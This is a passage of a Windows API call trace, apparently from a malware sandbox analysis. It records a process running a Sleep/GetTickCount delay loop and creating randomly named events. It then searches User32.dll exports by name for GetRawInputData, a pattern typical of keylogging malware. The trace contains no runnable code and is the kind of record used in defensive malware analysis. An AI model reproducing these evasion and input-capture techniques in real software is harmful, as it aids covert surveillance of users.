[0131.339] Sleep (dwMilliseconds=0x1) [0131.340] GetTickCount () returned 0x151f11f [0131.340] Sleep (dwMilliseconds=0x1) [0131.342] GetTickCount () returned 0x151f11f [0131.342] Sleep (dwMilliseconds=0x1) [0131.344] GetTickCount () returned 0x151f11f [0131.344] Sleep (dwMilliseconds=0x1) [0131.346] GetTickCount () returned 0x151f11f [0131.346] Sleep (dwMilliseconds=0x1) [0131.347] GetTickCount () returned 0x151f11f [0131.347] Sleep (dwMilliseconds=0x1) [0131.349] GetTickCount () returned 0x151f11f [0131.349] Sleep (dwMilliseconds=0x1) [0131.351] GetTickCount () returned 0x151f11f [0131.351] Sleep (dwMilliseconds=0x1) [0131.353] GetTickCount () returned 0x151f12f [0131.353] Sleep (dwMilliseconds=0x1) [0131.358] GetTickCount () returned 0x151f12f [0131.358] Sleep (dwMilliseconds=0x1) [0131.360] GetTickCount () returned 0x151f12f [0131.360] Sleep (dwMilliseconds=0x1) [0131.362] GetTickCount () returned 0x151f12f [0131.362] Sleep (dwMilliseconds=0x1) [0131.363] GetTickCount () returned 0x151f12f [0131.363] Sleep (dwMilliseconds=0x1) [0131.365] GetTickCount () returned 0x151f12f [0131.365] Sleep (dwMilliseconds=0x1) [0131.366] GetTickCount () returned 0x151f12f [0131.366] Sleep (dwMilliseconds=0x1) [0131.368] GetTickCount () returned 0x151f12f [0131.368] Sleep (dwMilliseconds=0x1) [0131.369] GetTickCount () returned 0x151f13e [0131.369] Sleep (dwMilliseconds=0x1) [0131.403] GetTickCount () returned 0x151f15d [0131.403] Sleep (dwMilliseconds=0x1) [0131.405] GetTickCount () returned 0x151f15d [0131.405] Sleep (dwMilliseconds=0x1) [0131.406] GetTickCount () returned 0x151f15d [0131.406] Sleep (dwMilliseconds=0x1) [0131.408] GetTickCount () returned 0x151f15d [0131.408] Sleep (dwMilliseconds=0x1) [0131.412] GetTickCount () returned 0x151f15d [0131.412] Sleep (dwMilliseconds=0x1) [0131.414] GetTickCount () returned 0x151f15d [0131.414] Sleep (dwMilliseconds=0x1) [0131.416] GetTickCount () returned 0x151f16d [0131.416] Sleep (dwMilliseconds=0x1) [0131.421] GetTickCount () returned 0x151f16d [0131.422] Sleep (dwMilliseconds=0x1) [0131.424] GetTickCount () returned 0x151f16d [0131.424] Sleep (dwMilliseconds=0x1) [0131.428] GetTickCount () returned 0x151f16d [0131.428] Sleep (dwMilliseconds=0x1) [0131.436] GetTickCount () returned 0x151f17d [0131.436] Sleep (dwMilliseconds=0x1) [0131.438] GetTickCount () returned 0x151f17d [0131.438] Sleep (dwMilliseconds=0x1) [0131.439] GetTickCount () returned 0x151f17d [0131.439] Sleep (dwMilliseconds=0x1) [0131.441] GetTickCount () returned 0x151f17d [0131.441] Sleep (dwMilliseconds=0x1) [0131.444] GetTickCount () returned 0x151f17d [0131.444] Sleep (dwMilliseconds=0x1) [0131.446] GetTickCount () returned 0x151f17d [0131.446] Sleep (dwMilliseconds=0x1) [0131.448] GetTickCount () returned 0x151f18c [0131.448] Sleep (dwMilliseconds=0x1) [0131.449] GetTickCount () returned 0x151f18c [0131.449] Sleep (dwMilliseconds=0x1) [0131.451] GetTickCount () returned 0x151f18c [0131.451] Sleep (dwMilliseconds=0x1) [0131.452] GetTickCount () returned 0x151f18c [0131.452] Sleep (dwMilliseconds=0x1) [0131.457] GetTickCount () returned 0x151f18c [0131.457] Sleep (dwMilliseconds=0x1) [0131.458] GetTickCount () returned 0x151f18c [0131.458] Sleep (dwMilliseconds=0x1) [0131.462] GetTickCount () returned 0x151f18c [0131.462] Sleep (dwMilliseconds=0x1) [0131.463] GetTickCount () returned 0x151f19c [0131.463] Sleep (dwMilliseconds=0x1) [0131.466] GetTickCount () returned 0x151f19c [0131.466] Sleep (dwMilliseconds=0x1) [0131.467] GetTickCount () returned 0x151f19c [0131.467] Sleep (dwMilliseconds=0x1) [0131.471] GetTickCount () returned 0x151f19c [0131.471] Sleep (dwMilliseconds=0x1) [0131.472] GetTickCount () returned 0x151f19c [0131.472] Sleep (dwMilliseconds=0x1) [0131.473] GetTickCount () returned 0x151f19c [0131.473] Sleep (dwMilliseconds=0x1) [0131.475] GetTickCount () returned 0x151f19c [0131.475] Sleep (dwMilliseconds=0x1) [0131.477] GetTickCount () returned 0x151f19c [0131.477] Sleep (dwMilliseconds=0x1) [0131.479] GetTickCount () returned 0x151f1ac [0131.479] Sleep (dwMilliseconds=0x1) [0131.480] GetTickCount () returned 0x151f1ac [0131.480] Sleep (dwMilliseconds=0x1) [0131.482] GetTickCount () returned 0x151f1ac [0131.482] Sleep (dwMilliseconds=0x1) [0131.484] GetTickCount () returned 0x151f1ac [0131.484] Sleep (dwMilliseconds=0x1) [0131.485] GetTickCount () returned 0x151f1ac [0131.485] Sleep (dwMilliseconds=0x1) [0131.488] GetTickCount () returned 0x151f1ac [0131.488] Sleep (dwMilliseconds=0x1) [0131.489] GetTickCount () returned 0x151f1ac [0131.489] Sleep (dwMilliseconds=0x1) [0131.491] GetTickCount () returned 0x151f1ac [0131.491] Sleep (dwMilliseconds=0x1) [0131.492] GetTickCount () returned 0x151f1ac [0131.492] Sleep (dwMilliseconds=0x1) [0131.497] GetTickCount () returned 0x151f1bb [0131.497] lstrlenA (lpString="R2NKxcFaXs") returned 10 [0131.497] lstrlenA (lpString="R2NKxcFaXs") returned 10 [0131.497] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e40000 [0131.498] lstrcpyA (in: lpString1=0x2e40000, lpString2="R2NKxcFaXs" | out: lpString1="R2NKxcFaXs") returned="R2NKxcFaXs" [0131.498] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.547] lstrlenA (lpString="R2NKxcFaXs") returned 10 [0131.547] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x9d0000 [0131.548] lstrcatA (in: lpString1="", lpString2="R2NKxcFaXs" | out: lpString1="R2NKxcFaXs") returned="R2NKxcFaXs" [0131.548] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="R2NKxcFaXs") returned 0x248 [0131.548] VirtualFree (lpAddress=0x2e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.548] lstrlenA (lpString="xANu7w94ww") returned 10 [0131.549] lstrlenA (lpString="xANu7w94ww") returned 10 [0131.549] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e40000 [0131.549] lstrcpyA (in: lpString1=0x2e40000, lpString2="xANu7w94ww" | out: lpString1="xANu7w94ww") returned="xANu7w94ww" [0131.549] VirtualFree (lpAddress=0x9e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.549] lstrlenA (lpString="xANu7w94ww") returned 10 [0131.549] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0131.550] lstrcatA (in: lpString1="", lpString2="xANu7w94ww" | out: lpString1="xANu7w94ww") returned="xANu7w94ww" [0131.550] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="xANu7w94ww") returned 0x24c [0131.550] VirtualFree (lpAddress=0x2e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.551] lstrlenA (lpString="haTgZ6rKPO") returned 10 [0131.551] lstrlenA (lpString="haTgZ6rKPO") returned 10 [0131.551] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e40000 [0131.551] lstrcpyA (in: lpString1=0x2e40000, lpString2="haTgZ6rKPO" | out: lpString1="haTgZ6rKPO") returned="haTgZ6rKPO" [0131.551] VirtualFree (lpAddress=0x9f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.552] lstrlenA (lpString="haTgZ6rKPO") returned 10 [0131.552] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x9f0000 [0131.552] lstrcatA (in: lpString1="", lpString2="haTgZ6rKPO" | out: lpString1="haTgZ6rKPO") returned="haTgZ6rKPO" [0131.552] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="haTgZ6rKPO") returned 0x274 [0131.552] VirtualFree (lpAddress=0x2e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.553] lstrlenA (lpString="DYtqBKi6oC") returned 10 [0131.553] lstrlenA (lpString="DYtqBKi6oC") returned 10 [0131.553] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e40000 [0131.553] lstrcpyA (in: lpString1=0x2e40000, lpString2="DYtqBKi6oC" | out: lpString1="DYtqBKi6oC") returned="DYtqBKi6oC" [0131.553] VirtualFree (lpAddress=0xa00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.554] lstrlenA (lpString="DYtqBKi6oC") returned 10 [0131.554] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0xa00000 [0131.554] lstrcatA (in: lpString1="", lpString2="DYtqBKi6oC" | out: lpString1="DYtqBKi6oC") returned="DYtqBKi6oC" [0131.554] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="DYtqBKi6oC") returned 0x278 [0131.554] VirtualFree (lpAddress=0x2e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.555] lstrlenA (lpString="SqwWmMKaAQ") returned 10 [0131.555] lstrlenA (lpString="SqwWmMKaAQ") returned 10 [0131.555] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e40000 [0131.555] lstrcpyA (in: lpString1=0x2e40000, lpString2="SqwWmMKaAQ" | out: lpString1="SqwWmMKaAQ") returned="SqwWmMKaAQ" [0131.555] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.555] lstrlenA (lpString="SqwWmMKaAQ") returned 10 [0131.555] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0xa10000 [0131.556] lstrcatA (in: lpString1="", lpString2="SqwWmMKaAQ" | out: lpString1="SqwWmMKaAQ") returned="SqwWmMKaAQ" [0131.556] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="SqwWmMKaAQ") returned 0x27c [0131.556] VirtualFree (lpAddress=0x2e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.556] lstrlenA (lpString="yoe6wOE4WS") returned 10 [0131.556] lstrlenA (lpString="yoe6wOE4WS") returned 10 [0131.556] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e40000 [0131.557] lstrcpyA (in: lpString1=0x2e40000, lpString2="yoe6wOE4WS" | out: lpString1="yoe6wOE4WS") returned="yoe6wOE4WS" [0131.557] VirtualFree (lpAddress=0x2e30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.557] lstrlenA (lpString="yoe6wOE4WS") returned 10 [0131.557] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2e30000 [0131.558] lstrcatA (in: lpString1="", lpString2="yoe6wOE4WS" | out: lpString1="yoe6wOE4WS") returned="yoe6wOE4WS" [0131.558] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="yoe6wOE4WS") returned 0x280 [0131.558] VirtualFree (lpAddress=0x2e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.559] GetProcessHeap () returned 0x7c0000 [0131.559] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x54) returned 0x7e3970 [0131.559] GetProcessHeap () returned 0x7c0000 [0131.559] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x7c) returned 0x7dc1d0 [0131.560] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x284 [0131.560] LoadLibraryW (lpLibFileName="User32.dll") returned 0x75640000 [0131.560] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1 [0131.567] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0131.568] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CheckDBCSEnabledExt", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CheckProcessForClipboardAccess", lpString2="GetRawInputData") returned -1 [0131.569] lstrcmpA (lpString1="CheckProcessSession", lpString2="GetRawInputData") returned -1 [0131.570] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0131.572] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDCompositionHwndTarget", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateMDIWindowW", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1 [0131.573] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CreateWindowExW", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CreateWindowInBand", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CreateWindowInBandEx", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CreateWindowIndirect", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1 [0131.574] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeReconnect", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1 [0131.575] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DeferWindowPosAndBand", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DestroyDCompositionHwndTarget", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1 [0131.576] lstrcmpA 